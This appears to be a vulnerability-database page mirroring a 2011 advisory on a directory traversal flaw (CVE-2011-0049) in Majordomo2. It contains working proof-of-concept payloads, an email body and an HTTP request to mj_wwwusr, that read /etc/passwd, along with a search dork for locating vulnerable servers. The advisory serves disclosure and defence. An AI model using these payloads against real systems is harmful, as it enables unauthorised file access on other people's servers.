Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Majordomo2 - 'SMTP/HTTP' Directory Traversal

🗓️ 03 Feb 2011 00:00:00Reported by Michael BrooksType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 66 Views

Majordomo2 'SMTP/HTTP' directory traversal vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Majordomo2 - Directory Traversal (SMTP/HTTP)
3 Feb 201100:00
zdt
Circl		CVE-2011-0049
3 Feb 201100:00
circl
CVE		CVE-2011-0049
4 Feb 201100:00
cve
Cvelist		CVE-2011-0049
4 Feb 201100:00
cvelist
d2		DSquare Exploit Pack: D2SEC_MAJORDOMO
4 Feb 201101:00
d2
Dsquare		Majordomo 2 File Disclosure
27 Apr 201200:00
dsquare
exploitpack		Majordomo2 - SMTPHTTP Directory Traversal
3 Feb 201100:00
exploitpack
Tenable Nessus		Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access
16 Feb 201100:00
nessus
Metasploit		Majordomo2 _list_file_get() Directory Traversal
12 Mar 201116:38
metasploit
Nmap		http-majordomo2-dir-traversal NSE Script
27 Jun 201120:22
nmap
Rows per page
Original Advisory: https://sitewat.ch/en/Advisory/View/1
Credit: Michael Brooks (https://sitewat.ch)
Vulnerability:  Directory Traversal
Software: Majordomo2
Identifier:CVE-2011-0049
Vendor: http://www.mj2.org/
Affected Build: 20110121 and prior
Google dork:inurl:mj_wwwusr

Special thanks to Dave Miller,  Reed Loden and the rest of the Mozilla
security team for handling the issue.

This vulnerability is exploitable via ALL of Majordomo2's interfaces.
*Including
e-mail*.  Send an email to majordomo's mail interface (for example:
[email protected]) with the body of the message as follows:
help ../../../../../../../../../../../../../etc/passwd

I'll give you one guess as to the contents of the response email ;).

PoC for HTTP:
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Feb 2011 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
EPSS0.90582
majordomo2directory traversalvulnerabilitysmtphttpadvisorymichael brookscve-2011-0049vendoraffected buildgoogle dorkexploitableinterfacesemailpochttplocalhostexploit
66